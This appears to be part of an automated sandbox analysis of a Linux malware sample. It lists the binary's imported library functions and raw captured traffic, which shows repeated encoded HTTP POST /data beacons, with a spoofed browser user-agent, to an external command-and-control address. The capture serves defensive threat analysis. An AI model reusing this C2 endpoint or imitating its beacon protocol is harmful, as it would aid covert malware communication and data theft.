                                              getgrnam_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              getgrouplistGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              getnameinfoGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              getpwnam_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              getpwuid_rGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              getuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              mallocGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              mmapGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              munmapGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              nanosleepGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_attr_destroyGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_attr_getstackGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_attr_getstacksizeGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_attr_initGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_cond_broadcastGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_cond_waitGLIBC_2.3.2libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_createGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_detachGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_getattr_npGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_key_createGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_mutex_lockGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_mutex_unlockGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_selfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_setspecificGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              pthread_sigmaskGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              setegidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              setenvGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              seteuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              setgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              setgroupsGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              setregidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              setresgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              setresuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              setreuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              setuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              sigactionGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              sigaddsetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              sigemptysetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              sigfillsetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              sigismemberGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              stderrGLIBC_2.2.5libc.so.6.dynsym0x00OBJECT<unknown>DEFAULTSHN_UNDEF
                                              strerrorGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              sysconfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              unsetenvGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                                              vfprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF

                                              Download Network PCAP: filteredfull

                                              • Total Packets: 36
                                              • 443 (HTTPS)
                                              • 80 (HTTP)
                                              • 53 (DNS)
                                              TimestampSource PortDest PortSource IPDest IP
                                              Mar 18, 2025 09:05:52.007606030 CET5756480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:52.012397051 CET8057564134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:52.012470961 CET5756480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:52.014861107 CET5756480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:52.019562006 CET8057564134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:52.019670010 CET8057564134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:52.663738966 CET8057564134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:52.663758993 CET8057564134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:52.663772106 CET8057564134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:52.663785934 CET8057564134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:52.663903952 CET5756480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:52.663903952 CET5756480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:52.663903952 CET5756480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:52.665812016 CET5756480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:52.670516014 CET8057564134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:52.678052902 CET5756680192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:52.682940006 CET8057566134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:52.683031082 CET5756680192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:52.684648037 CET5756680192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:52.689291000 CET8057566134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:53.520775080 CET8057566134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:53.520833969 CET8057566134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:53.520951033 CET5756680192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:53.522397041 CET5756680192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:53.523858070 CET5756880192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:53.527107000 CET8057566134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:53.528609991 CET8057568134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:53.528683901 CET5756880192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:53.530941963 CET5756880192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:53.535650969 CET8057568134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:54.147046089 CET8057568134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:54.147074938 CET8057568134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:54.147216082 CET5756880192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:54.149174929 CET5756880192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:05:54.153892994 CET8057568134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:05:59.835094929 CET48202443192.168.2.13185.125.190.26
                                              Mar 18, 2025 09:06:04.156991959 CET5757080192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:04.161732912 CET8057570134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:04.161813974 CET5757080192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:04.163463116 CET5757080192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:04.168071032 CET8057570134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:04.826915026 CET8057570134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:04.827039003 CET8057570134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:04.827114105 CET5757080192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:04.829243898 CET5757080192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:04.833868980 CET8057570134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:14.840240002 CET5757280192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:14.845017910 CET8057572134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:14.845107079 CET5757280192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:14.847944021 CET5757280192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:14.852637053 CET8057572134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:15.477344990 CET8057572134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:15.477399111 CET8057572134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:15.477523088 CET5757280192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:15.480922937 CET5757280192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:15.485570908 CET8057572134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:25.482278109 CET5757480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:25.487143040 CET8057574134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:25.487262011 CET5757480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:25.488946915 CET5757480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:25.493700981 CET8057574134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:26.114597082 CET8057574134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:26.114734888 CET8057574134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:26.114835024 CET5757480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:26.116276979 CET5757480192.168.2.13134.209.250.88
                                              Mar 18, 2025 09:06:26.120913029 CET8057574134.209.250.88192.168.2.13
                                              Mar 18, 2025 09:06:32.091120958 CET48202443192.168.2.13185.125.190.26
                                              TimestampSource PortDest PortSource IPDest IP
                                              Mar 18, 2025 09:08:33.838804007 CET3480553192.168.2.131.1.1.1
                                              Mar 18, 2025 09:08:33.838865995 CET5609953192.168.2.131.1.1.1
                                              Mar 18, 2025 09:08:33.846585035 CET53348051.1.1.1192.168.2.13
                                              Mar 18, 2025 09:08:33.847278118 CET53560991.1.1.1192.168.2.13
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Mar 18, 2025 09:08:33.838804007 CET192.168.2.131.1.1.10xff2fStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                              Mar 18, 2025 09:08:33.838865995 CET192.168.2.131.1.1.10xc7b1Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Mar 18, 2025 09:08:33.846585035 CET1.1.1.1192.168.2.130xff2fNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                              Mar 18, 2025 09:08:33.846585035 CET1.1.1.1192.168.2.130xff2fNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                              • 134.209.250.88
                                              Session IDSource IPSource PortDestination IPDestination Port
                                              0192.168.2.1357564134.209.250.8880
                                              TimestampBytes transferredDirectionData
                                              Mar 18, 2025 09:05:52.014861107 CET1804OUTPOST /data HTTP/1.1
                                              Host: 134.209.250.88
                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 1608
                                              Accept-Encoding: gzip
                                              Connection: close
                                              Data Raw: 4e 57 52 6a 4e 54 41 7a 59 32 59 74 4e 6a 59 33 4d 53 30 30 4e 54 4d 79 4c 57 45 77 4d 6a 45 74 59 6a 64 6c 4f 44 4a 6c 5a 44 45 7a 59 54 41 33 66 45 6c 53 53 42 52 4c 2b 70 45 4a 50 66 38 6f 65 2f 78 39 75 41 43 6a 41 34 65 4b 7a 36 53 32 43 45 6e 66 55 45 7a 45 4d 4c 33 6c 64 36 32 48 4b 6c 33 65 78 4e 71 49 48 37 6f 46 4d 33 64 79 42 4a 37 61 57 6e 63 69 30 76 64 44 53 51 6c 58 4b 34 46 35 71 4f 6a 55 61 49 6f 77 52 41 50 75 35 38 59 62 4a 65 73 62 74 4e 65 4b 68 37 51 33 6b 37 39 6c 58 4a 39 45 6d 79 62 6e 73 67 44 55 6e 6d 47 49 68 72 4b 70 6f 59 65 41 68 61 6c 68 72 64 4a 2f 41 41 34 47 62 37 71 64 4d 6e 34 47 72 6e 76 70 45 32 4b 42 6e 72 6d 70 65 65 35 34 71 46 4a 36 77 6e 34 57 47 79 58 72 53 74 4c 6b 61 6f 39 6c 46 37 2f 58 2f 6c 6c 66 49 41 46 63 38 70 38 66 5a 46 5a 59 41 2b 66 7a 32 76 48 68 69 6f 74 73 6c 49 55 30 30 68 53 42 4d 2f 31 79 42 6a 39 59 4c 68 32 34 65 6a 43 73 33 63 77 39 59 67 6a 56 6a 77 50 41 73 5a 6c 6e 41 63 37 79 56 45 45 7a 31 52 4c 65 36 75 50 76 4c 48 65 74 47 54 [TRUNCATED]
                                              Data Ascii: NWRjNTAzY2YtNjY3MS00NTMyLWEwMjEtYjdlODJlZDEzYTA3fElSSBRL+pEJPf8oe/x9uACjA4eKz6S2CEnfUEzEML3ld62HKl3exNqIH7oFM3dyBJ7aWnci0vdDSQlXK4F5qOjUaIowRAPu58YbJesbtNeKh7Q3k79lXJ9EmybnsgDUnmGIhrKpoYeAhalhrdJ/AA4Gb7qdMn4GrnvpE2KBnrmpee54qFJ6wn4WGyXrStLkao9lF7/X/llfIAFc8p8fZFZYA+fz2vHhiotslIU00hSBM/1yBj9YLh24ejCs3cw9YgjVjwPAsZlnAc7yVEEz1RLe6uPvLHetGTTmAyn1pL4yf+cIC/Z850ljVnBzUhvE6zPsSoXM/FqK8TKBOF2jbqxX0q2jaX8or/mKyhwAPKrEy2e9bL4DuHHysp/rhiqgjZH/us6pB/th6QAHjTTx9gvFHtzM2SAOnm9M6o8+E83btrIkvZ+1PyxrYePhEgqHo3x/O+6V4c7Fqa7ZtkQiee+UqctE0qfzhgsiB7bxdjqxwrdVWUp+sIaWdyNSUL0N3F+opegtHQs770j/Al6OF+YtQ4Uz1CCq0GBdcHTQit5Lproy26nSioSiqD8qtPavGH68ujSbDAuxVCXWx8TldyvEKHDdbKU0X2PNIDqUakOkYSiBRHa8ZUlEJm2VzTGd8DMfBbtaw00KBjbW6gHUD0NnuuGzPXE7r/46A5attAy2yqKKy0Khp1T9KE3/6vtUWQ9ay8Ilxta2e+AYbSlRPZgtLgfyyHL9siiD6s9uYkKXI8VWuGqXlQXDhEFIDGraLRVAfofF5PKBOVdAux1sBgS6uK2PCsu9mhAAsuIou09Sj8bwsTmoYr7fx+0NKlPIADNSocCyJd8rTl0G5pdT/Epbs7jId5b3t6aXXsQmaHHqxnzbeK9FzlFQgr/tOhq+02B0SljRMhnfDjf7SoyyDLsMPXJ1tZKL/NNSnejRflQvZDhCAzPsiWbl6RDNfQRb6sbB [TRUNCATED]
                                              Mar 18, 2025 09:05:52.663738966 CET1236INHTTP/1.1 200 OK
                                              Cache-Control: max-age=0, no-cache
                                              Content-Type: application/javascript; charset=utf-8
                                              Content-Type: application/octet-stream
                                              Date: Tue, 18 Mar 2025 08:05:52 GMT
                                              Pragma: no-cache
                                              Server: NetDNA-cache/2.2
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Data Raw: 61 33 30 0d 0a 4e 57 52 6a 4e 54 41 7a 59 32 59 74 4e 6a 59 33 4d 53 30 30 4e 54 4d 79 4c 57 45 77 4d 6a 45 74 59 6a 64 6c 4f 44 4a 6c 5a 44 45 7a 59 54 41 33 75 64 78 2b 4c 31 44 46 77 45 55 42 62 45 6e 4f 6b 33 43 31 59 31 65 71 78 65 61 44 75 53 42 74 46 44 44 75 65 66 71 72 77 38 4e 6d 6a 4e 59 61 55 6b 30 57 49 6e 53 7a 33 58 68 4d 64 47 56 73 39 49 76 78 2f 63 69 6b 6c 77 55 47 52 41 6c 48 6a 4f 55 38 4e 4f 57 78 70 31 4c 78 36 67 6d 4a 35 79 57 35 73 64 76 39 68 75 4e 36 74 72 74 51 6f 71 76 46 66 34 75 6c 50 6c 34 6c 77 39 54 4d 70 59 5a 54 76 4b 63 49 62 30 53 4d 2f 4d 5a 6e 2f 73 37 32 4a 33 53 30 61 4f 32 74 44 32 2f 56 42 79 77 4b 6b 63 4b 44 4e 70 43 41 53 50 6e 42 41 72 66 33 52 54 5a 31 32 49 41 6d 56 53 45 74 39 6a 42 34 6a 4b 33 31 4d 66 62 46 54 35 37 6c 71 6b 48 6a 33 31 64 62 34 62 69 44 65 73 42 33 38 42 4d 78 5a 35 72 68 43 41 58 56 75 67 44 72 55 74 6c 78 71 6c 46 61 2f 2b 43 58 35 62 47 7a 6b 41 6c 77 30 4f 41 6d 68 38 41 7a 34 46 69 6c 37 46 49 38 2b 4f 72 53 6a 2b 75 63 70 [TRUNCATED]
                                              Data Ascii: a30NWRjNTAzY2YtNjY3MS00NTMyLWEwMjEtYjdlODJlZDEzYTA3udx+L1DFwEUBbEnOk3C1Y1eqxeaDuSBtFDDuefqrw8NmjNYaUk0WInSz3XhMdGVs9Ivx/ciklwUGRAlHjOU8NOWxp1Lx6gmJ5yW5sdv9huN6trtQoqvFf4ulPl4lw9TMpYZTvKcIb0SM/MZn/s72J3S0aO2tD2/VBywKkcKDNpCASPnBArf3RTZ12IAmVSEt9jB4jK31MfbFT57lqkHj31db4biDesB38BMxZ5rhCAXVugDrUtlxqlFa/+CX5bGzkAlw0OAmh8Az4Fil7FI8+OrSj+ucpndSKh6SBdPGxV40F0Lfsi/Nok0H8quHVcmassOKXftpjetZXcaNsaZU8YHRcz29VmMGRdphi3nFzO4ssvR92nR0+SdLHgFy8uixsXhakyDPh7q+FpRzaclbip2Z5deRdfOdvkLJvoJ4LVNLz+U5XaUPoeZYA7SdWYuGOkGjCKyLRGxu9vJMvnLiZYviYQKM54ADzUPKpcr3vvkG6omECutYYBRHWmZFI2OjagFH4fxcf7IehFVMnE7YTq/uRAc7wn4ZpuUpiXN0ycxK3BDUrs2oiHBr0fByvEk5ohJX7PabSW6hcKmnw94V5HiPGOuvPF9qQ5m4Jhv9mlgTF3pobFCfc5G+xVGqRipQZJWQ38U2RTSB7X/kRzoFSIg3d2HI3aCZWGlzrNDF0NzdEarRmv2+EskCouPgajeH/mc2vj+ohbQuu9WUmG6yH1Zo7fe8wlnBSJUmpZZL7kdwek8cCx+s5WUGSdzLsx4SKMSmgDfSStNz/nN4vDA5EkJArQn66EbzThy/sdye7k+kuh/MdTp7I7nheYagx2alNXso66bNVvENLppbwfpCFSkwi+j7w+Jha2ec4Hex8TA/j/c0qxnmWbPolK7vd/g
                                              Mar 18, 2025 09:05:52.663758993 CET1236INData Raw: 62 57 68 78 33 65 36 6e 6e 78 69 58 78 77 63 77 74 71 48 6c 54 63 61 34 53 4d 50 6e 35 35 78 75 4d 51 4d 36 2f 45 4c 77 45 4f 4e 77 54 4e 35 71 49 4b 34 56 30 72 35 35 38 4f 78 54 46 41 48 70 6b 4d 4a 53 72 51 6c 34 33 79 39 45 30 68 35 59 59 76
                                              Data Ascii: bWhx3e6nnxiXxwcwtqHlTca4SMPn55xuMQM6/ELwEONwTN5qIK4V0r558OxTFAHpkMJSrQl43y9E0h5YYvwPFN1MvMViOmxkqpaWGEG51xAZxrmOFAm4SbLtZbRdwqmlGKkyykLGllT56Nbxiuz030giPiIPsVr5xWw7ElCnICoY7bNc9jTYzrwYpDSWnC9x7HUXsH82CscPrABgGiF/vXxkKnVi5Z9pPY8BJJlvVZje7uKryUm
                                              Mar 18, 2025 09:05:52.663772106 CET460INData Raw: 6d 79 7a 49 50 48 48 6d 43 78 78 78 59 4d 77 31 62 38 72 7a 6a 4c 56 76 62 70 72 69 42 4a 39 63 69 45 47 73 44 4a 42 65 67 44 35 61 6b 38 59 36 61 44 50 32 46 35 6d 65 4c 74 4b 37 42 31 6d 72 45 77 70 74 77 70 6f 79 74 56 34 47 6c 50 4c 55 35 32
                                              Data Ascii: myzIPHHmCxxxYMw1b8rzjLVvbpriBJ9ciEGsDJBegD5ak8Y6aDP2F5meLtK7B1mrEwptwpoytV4GlPLU52fTCJ9s3qZ6QyuSRGsNRx1aI2hKsgDXy2NaJ3evsQn1Vb0o4PPwOs31ZmfEQetJn4j0gCxQu/Onkwwp1SrBM9m3GQ6tZQHIm6Qe/RMxKZU8gs7vBU3Hf6uaVWV8i53NoO6beK4/VSzgn8NozZgYqOrFlf/Ez19mO2b


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1192.168.2.1357566134.209.250.8880
                                              TimestampBytes transferredDirectionData
                                              Mar 18, 2025 09:05:52.684648037 CET971OUTPOST /data HTTP/1.1
                                              Host: 134.209.250.88
                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 776
                                              Accept-Encoding: gzip
                                              Connection: close
                                              Data Raw: 4e 44 6b 7a 4e 47 5a 6a 4d 54 6b 74 4d 57 56 68 59 53 30 30 4e 6d 59 35 4c 54 6c 6c 4d 44 6b 74 4e 7a 51 31 4f 54 51 79 4f 54 49 33 4d 6d 49 34 4d 2f 7a 79 45 44 6f 65 59 70 36 48 52 77 32 6a 4e 67 6a 4f 48 38 6e 75 36 48 37 4a 73 31 6b 73 39 75 39 6b 61 38 6e 37 33 64 4a 61 50 52 78 70 30 46 74 64 37 68 35 6f 59 67 58 36 70 47 38 6f 4e 38 72 4c 72 45 57 33 38 73 6d 37 68 53 70 46 30 70 52 54 2b 78 6d 33 42 4d 37 38 48 79 56 75 78 50 32 4e 47 64 77 4a 70 36 71 4d 6e 33 6c 58 72 72 48 62 52 68 37 55 63 32 69 49 54 46 7a 67 38 63 63 35 56 30 37 79 39 67 31 38 72 53 67 6e 46 70 64 77 73 2b 56 2b 56 79 59 7a 6e 48 2b 75 4c 48 45 5a 6e 51 75 41 50 54 6b 55 34 7a 39 67 74 56 33 42 36 31 38 61 71 2b 4d 2b 70 53 39 46 52 4c 70 58 68 72 70 66 4d 69 4f 48 63 6e 32 49 6c 67 2f 39 56 5a 37 77 32 4a 78 6a 37 33 6f 51 68 54 46 53 7a 50 70 78 71 49 58 66 36 67 37 41 74 54 6e 4e 42 50 56 41 79 53 58 32 2f 77 70 48 2b 32 53 39 77 55 57 35 71 45 4e 35 55 4c 46 2f 38 34 42 74 46 7a 39 55 65 34 39 56 7a 2b 36 66 6f 31 [TRUNCATED]
                                              Data Ascii: NDkzNGZjMTktMWVhYS00NmY5LTllMDktNzQ1OTQyOTI3MmI4M/zyEDoeYp6HRw2jNgjOH8nu6H7Js1ks9u9ka8n73dJaPRxp0Ftd7h5oYgX6pG8oN8rLrEW38sm7hSpF0pRT+xm3BM78HyVuxP2NGdwJp6qMn3lXrrHbRh7Uc2iITFzg8cc5V07y9g18rSgnFpdws+V+VyYznH+uLHEZnQuAPTkU4z9gtV3B618aq+M+pS9FRLpXhrpfMiOHcn2Ilg/9VZ7w2Jxj73oQhTFSzPpxqIXf6g7AtTnNBPVAySX2/wpH+2S9wUW5qEN5ULF/84BtFz9Ue49Vz+6fo1HXtWxuINXeiAb5TyugirRw1/Pq1NKzYEfmCBKog1jcrDV+dVRw0JMz8TvuM41WbJ50TifF3ZkoIk7Rlw2u2rdQgTxRLMqI+qywLg+CBIK3vtmmgNQCVHnWBYWs/Z+S/uCYg/jDCKuSDnfPJwfaXYvkmUfK5+bw8hFVT0BJRyWU5nN6oQ5Nh17/61QcaFihsYHVZDdq3mc9gJ5tqsM7mW8s63GGY0ytihmt6eG+/cwDQi2MncwjdlaNWdnMuzGLxeEB5peCuxf7DxfoUwhDSlhITzJhFKWnB7v8O8ERlb8vxc98868JN1v7w9314rGS6CTbPFxsxWG3noWZWBZYMoi3eIs9WbosLCQT7dMAuEG/8VHOzdefARpm7JxPqMXSXNKxAiNORQIzgPXq0qFgIq0yGBhYvz3VMFX2cifRZe8ERsrSBTiFLg==
                                              Mar 18, 2025 09:05:53.520775080 CET521INHTTP/1.1 200 OK
                                              Cache-Control: max-age=0, no-cache
                                              Content-Length: 240
                                              Content-Type: application/javascript; charset=utf-8
                                              Content-Type: application/octet-stream
                                              Date: Tue, 18 Mar 2025 08:05:53 GMT
                                              Pragma: no-cache
                                              Server: NetDNA-cache/2.2
                                              Connection: close
                                              Data Raw: 4e 44 6b 7a 4e 47 5a 6a 4d 54 6b 74 4d 57 56 68 59 53 30 30 4e 6d 59 35 4c 54 6c 6c 4d 44 6b 74 4e 7a 51 31 4f 54 51 79 4f 54 49 33 4d 6d 49 34 64 48 68 57 52 6a 6f 6c 62 37 71 54 54 32 69 4a 55 65 70 46 44 36 53 2b 79 45 77 31 77 77 76 5a 37 43 62 74 32 44 73 6c 38 52 6c 52 47 2f 33 76 51 34 56 68 6b 4d 56 65 50 45 4e 56 35 6c 4f 77 41 48 57 63 72 5a 7a 2f 43 61 57 7a 31 6b 43 38 4c 6e 67 63 6a 30 31 48 64 44 4b 34 7a 6e 50 6c 30 33 68 67 4f 57 54 6e 44 51 74 35 59 4d 67 65 64 57 6e 4d 68 37 6e 54 31 47 31 50 78 47 33 6d 7a 69 4e 35 4a 2b 63 72 4a 65 34 50 6b 6d 44 32 77 5a 55 7a 4b 59 63 65 37 36 52 4e 6c 5a 46 4a 55 55 6e 2f 4d 77 63 32 44 4a 47 72 2f 53 76 36 34 6a 2f 5a 76 4c 6b 2f 70 76 34 6a 78 52 31 49
                                              Data Ascii: NDkzNGZjMTktMWVhYS00NmY5LTllMDktNzQ1OTQyOTI3MmI4dHhWRjolb7qTT2iJUepFD6S+yEw1wwvZ7Cbt2Dsl8RlRG/3vQ4VhkMVePENV5lOwAHWcrZz/CaWz1kC8Lngcj01HdDK4znPl03hgOWTnDQt5YMgedWnMh7nT1G1PxG3mziN5J+crJe4PkmD2wZUzKYce76RNlZFJUUn/Mwc2DJGr/Sv64j/ZvLk/pv4jxR1I


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2192.168.2.1357568134.209.250.8880
                                              TimestampBytes transferredDirectionData
                                              Mar 18, 2025 09:05:53.530941963 CET415OUTPOST /data HTTP/1.1
                                              Host: 134.209.250.88
                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 220
                                              Accept-Encoding: gzip
                                              Connection: close
                                              Data Raw: 5a 54 5a 6c 4e 44 6c 69 4e 6a 49 74 4d 32 56 6a 5a 53 30 30 5a 6a 41 33 4c 54 67 7a 5a 54 55 74 59 54 68 6a 5a 47 55 78 4d 7a 45 31 4d 6a 45 35 6f 55 74 44 58 52 55 78 30 52 59 4c 6d 42 4a 53 74 79 51 37 4f 42 32 55 6a 58 35 73 33 46 36 56 6b 33 6e 58 64 56 2b 42 4c 61 64 44 67 77 63 34 76 6b 61 46 47 65 74 6f 78 35 52 71 75 48 67 67 71 45 70 32 6b 36 57 7a 79 56 45 68 71 64 51 44 4c 4d 56 47 51 33 37 79 54 5a 52 55 43 43 6b 71 71 6d 6a 47 6d 67 35 6b 76 68 64 59 46 6e 32 57 78 38 35 64 4d 6f 64 54 33 2f 6a 35 30 61 34 68 44 4e 54 70 70 66 36 6e 77 33 42 39 33 50 72 30 57 56 38 41 55 58 37 56 6d 6c 4f 36 61 4d 33 55 46 52 31 52 73 6c 6e 58 48 36 38 3d
                                              Data Ascii: ZTZlNDliNjItM2VjZS00ZjA3LTgzZTUtYThjZGUxMzE1MjE5oUtDXRUx0RYLmBJStyQ7OB2UjX5s3F6Vk3nXdV+BLadDgwc4vkaFGetox5RquHggqEp2k6WzyVEhqdQDLMVGQ37yTZRUCCkqqmjGmg5kvhdYFn2Wx85dModT3/j50a4hDNTppf6nw3B93Pr0WV8AUX7VmlO6aM3UFR1RslnXH68=
                                              Mar 18, 2025 09:05:54.147046089 CET457INHTTP/1.1 200 OK
                                              Cache-Control: max-age=0, no-cache
                                              Content-Length: 176
                                              Content-Type: application/javascript; charset=utf-8
                                              Content-Type: application/octet-stream
                                              Date: Tue, 18 Mar 2025 08:05:54 GMT
                                              Pragma: no-cache
                                              Server: NetDNA-cache/2.2
                                              Connection: close
